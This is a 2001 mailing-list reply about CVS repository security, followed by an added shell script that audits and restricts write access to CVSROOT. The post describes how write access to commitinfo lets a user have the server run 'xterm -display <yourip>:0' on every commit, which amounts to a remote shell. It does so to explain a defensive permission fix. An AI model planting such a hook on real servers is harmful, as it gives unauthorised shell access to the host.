
Re: cvs security - ssh vs pserver?

On Tue, Nov 27, 2001 at 10:08:57AM -0800, Peter Jay Salzman wrote:
> joey, i have no problem with plain text passwords.
> just as long as they can't get _shell access_ with that password.

I'd just like to point out one thing that I didn't see in this thread
earlier:  if you have write access to the CVS repository, it is possible
to get shell access also.

OK, it is not exactly that simple; I think it required write access to
the files in the CVSROOT directory (commitinfo, etc.).  You could then
modify those files so that, for example, whenever you commit a file, a
command "xterm -display <yourip>:0" would be run on the server.

However, there is a simple fix: just don't let the users touch the
files in the CVSROOT directory.  Use another group for CVSROOT, say
group 'prj' for repository users who are allowed to commit changes
but not run shells, and 'prj-adm' for users who are allowed to modify
files in CVSROOT (and potentially run a shell).

Unfortunately, I can't remember the details exactly and I don't have a
link at hand, so better read this message again with extreme prejudice.

Tommi Komulainen                                 Tommi.Komulainen@iki.fi
GPG 1024D/68388EE6    6FD6 DD79 EB38 BF6F 3533  09C0 04A8 9871 6838 8EE6
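
Added example, not code from the original post or from CVS itself: a small POSIX shell script that audits a repository for the split described above (committers may write to the modules, but nobody except a separate admin group may write under CVSROOT, because the server executes the CVSROOT hook files on commit) and applies either of the two fixes. The group names 'prj' and 'prj-adm', the repository layout and the sample files are assumptions made for the example; a real repository would be audited in place.

```sh
#!/bin/sh
# Added example, not code from the original post or from CVS itself.
# Checks the permission split the post describes: committers (group "prj")
# may write to the modules but must not be able to touch CVSROOT, because
# the server runs the CVSROOT admin files (commitinfo, loginfo, ...) on
# commit. Group names, repository layout and sample files are assumptions.
set -u

# make_sample_repo DIR
# Build a tiny constructed repository under DIR so the checks can run
# without a real CVS install.
make_sample_repo() {
  mkdir -p "$1/CVSROOT" "$1/module"
  : > "$1/CVSROOT/commitinfo"
  : > "$1/CVSROOT/loginfo"
  : > "$1/module/hello.c,v"
  chmod 2775 "$1/module"   # committers need group write (and setgid) here
}

# audit_cvsroot REPO ADMIN_GROUP
# Lists every path under REPO/CVSROOT that is world-writable, or
# group-writable for any group other than ADMIN_GROUP (the directory itself
# counts: write access to it lets anyone replace commitinfo). Returns 1 if
# something was found, 0 if CVSROOT is clean. -perm -020 / -perm -002 test
# that the group/other write bit is set; -perm and -group are POSIX find.
audit_cvsroot() {
  bad=$(find "$1/CVSROOT" \( \( -perm -020 ! -group "$2" \) -o -perm -002 \) -print)
  if [ -n "$bad" ]; then
    printf 'non-admins could modify:\n%s\n' "$bad" >&2
    return 1
  fi
  return 0
}

# lock_cvsroot REPO
# Simplest fix: only the repository owner may write CVSROOT; committers get
# read-only access (CVS still needs to read the admin files).
lock_cvsroot() {
  chmod -R go-w "$1/CVSROOT"
}

# delegate_cvsroot REPO ADMIN_GROUP
# The post's two-group variant: hand CVSROOT to a separate admin group
# ("prj-adm") that is allowed to change the hook files. Group-writable for
# them, never world-writable.
delegate_cvsroot() {
  chgrp -R "$2" "$1/CVSROOT" && chmod -R g+w,o-w "$1/CVSROOT"
}

# Demonstration when run as "sh cvsroot-perms.sh --demo".
if [ "${1:-}" = "--demo" ]; then
  repo=$(mktemp -d)
  make_sample_repo "$repo"
  chmod o+w "$repo/CVSROOT/commitinfo"          # the misconfiguration
  audit_cvsroot "$repo" "$(id -gn)" || echo "CVSROOT is exposed"
  lock_cvsroot "$repo"
  audit_cvsroot "$repo" "$(id -gn)" && echo "CVSROOT locked down"
  rm -rf "$repo"
fi
```

The demo uses the caller's own primary group as the admin group so it runs anywhere; on a real server you would pass 'prj-adm' (after creating it) and run the audit against the actual repository path. Keep the CVSROOT files readable by committers either way, since the server has to read commitinfo and friends on every commit; only the write bits are the problem.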
